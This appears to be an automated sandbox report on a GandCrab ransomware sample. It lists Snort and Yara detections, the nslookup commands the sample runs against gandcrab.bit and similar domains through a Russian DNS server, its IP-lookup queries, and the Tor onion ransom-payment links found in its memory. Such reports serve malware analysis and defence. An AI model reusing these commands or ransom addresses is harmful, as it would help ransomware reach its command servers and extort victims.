Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:52818 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:52819 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:52820 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:54197 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:64543 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:64544 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:64545 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:64546 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:53592 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:53593 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:53594 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:53595 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56360 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56361 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56362 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56363 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:51364 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:51365 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:51366 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:51367 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:49334 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:49335 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:49336 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:49337 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:58159 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:58160 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:58161 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:58162 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:52845 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:52846 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:52847 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:52848 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:64963 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:64964 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:64965 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:64966 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56297 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56298 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56299 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56300 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:64649 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:64650 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:64651 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:64652 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:51889 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:51890 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:51891 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:51892 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:53043 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:53044 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:53045 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:53046 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:54510 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:54511 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:54512 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:54513 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:53195 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:53196 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:53197 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:53198 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:60010 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:60011 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:60012 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:60013 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:54202 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:54203 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:54204 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:54205 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:50254 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:50255 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:50256 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:50257 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:64798 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:64799 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:64800 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:64801 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:62539 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:62540 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:62541 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:62542 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:62038 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:62039 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:62040 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:62041 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:63672 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:63673 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:63674 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:63675 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:61172 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:61173 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:61174 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:61175 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:56429 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:56430 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:56431 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:56432 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56433 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56434 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56435 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:56436 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:49467 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:49468 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:49469 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2026737 ET TROJAN Observed GandCrab Domain (gandcrab .bit) 192.168.2.6:49470 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:54881 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:54882 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:54883 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829498 ETPRO TROJAN GandCrab DNS Lookup 1 192.168.2.6:54884 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:54298 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:54299 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:54300 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2829500 ETPRO TROJAN GandCrab DNS Lookup 3 192.168.2.6:54301 -> 8.8.8.8:53

Contains functionality to determine the online IP of the system

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Code function: 1_2_00A868F0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	1_2_00A868F0
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Code function: 1_2_00A868F0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	1_2_00A868F0
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Code function: 11_2_00D768F0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	11_2_00D768F0
Source: C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Code function: 11_2_00D768F0 VirtualAlloc,VirtualAlloc,lstrlenW,lstrlenA,wsprintfW,VirtualFree,InternetCloseHandle, ipv4bot.whatismyipaddress.com	11_2_00D768F0

Found Tor onion address

Source: eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 4. Open link in tor browser: http://gdcbghvjyqy7jclk.onion/5432c2cfc05a5a97
Source: eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 1. http://gdcbghvjyqy7jclk.onion.top/5432c2cfc05a5a97
Source: eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 2. http://gdcbghvjyqy7jclk.onion.casa/5432c2cfc05a5a97
Source: eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 3. http://gdcbghvjyqy7jclk.onion.guide/5432c2cfc05a5a97
Source: eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 4. http://gdcbghvjyqy7jclk.onion.rip/5432c2cfc05a5a97
Source: eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: 5. http://gdcbghvjyqy7jclk.onion.plus/5432c2cfc05a5a97

Uses nslookup.exe to query domains

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup gandcrab.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup nomoreransom.bit dns1.soprodns.ru	Jump to behavior
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	Process created: C:\Windows\SysWOW64\nslookup.exe nslookup emsisoft.bit dns1.soprodns.ru	Jump to behavior

May check the online IP address of the machine

Source: C:\Users\user\Desktop\eW1QrimJYd.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\eW1QrimJYd.exe	DNS query: name: ipv4bot.whatismyipaddress.com

Source: eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://gdcbghvjyqy7jclk.onion.casa/5432c2cfc05a5a97
Source: eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://gdcbghvjyqy7jclk.onion.guide/5432c2cfc05a5a97
Source: eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://gdcbghvjyqy7jclk.onion.plus/5432c2cfc05a5a97
Source: eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://gdcbghvjyqy7jclk.onion.rip/5432c2cfc05a5a97
Source: eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://gdcbghvjyqy7jclk.onion.top/5432c2cfc05a5a97
Source: eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://gdcbghvjyqy7jclk.onion/5432c2cfc05a5a97
Source: eW1QrimJYd.exe, 00000001.00000002.531861425.00000000008CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/
Source: eW1QrimJYd.exe, 00000001.00000002.531861425.00000000008CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/0
Source: eW1QrimJYd.exe, 00000001.00000002.531861425.00000000008CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/D
Source: eW1QrimJYd.exe, 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.torproject.org/

Source: unknown

DNS traffic detected: queries for: ipv4bot.whatismyipaddress.com

Source: C:\Users\user\Desktop\eW1QrimJYd.exe

Code function: 1_2_00A87A00 lstrcatW,InternetCloseHandle,InternetConnectW,VirtualAlloc,wsprintfW,HttpOpenRequestW,HttpAddRequestHeadersW,HttpSendRequestW,InternetReadFile,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,VirtualFree,

1_2_00A87A00

Source: eW1QrimJYd.exe, 00000001.00000002.531861425.00000000008CA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Yara detected Gandcrab

Source: Yara match	File source: eW1QrimJYd.exe, type: SAMPLE
Source: Yara match	File source: 11.0.qvvfpl.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.qvvfpl.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.0.qvvfpl.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.eW1QrimJYd.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.eW1QrimJYd.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.qvvfpl.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000002.311448565.0000000000D79000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.308301094.0000000000D79000.00000008.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.290444735.0000000000D79000.00000008.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
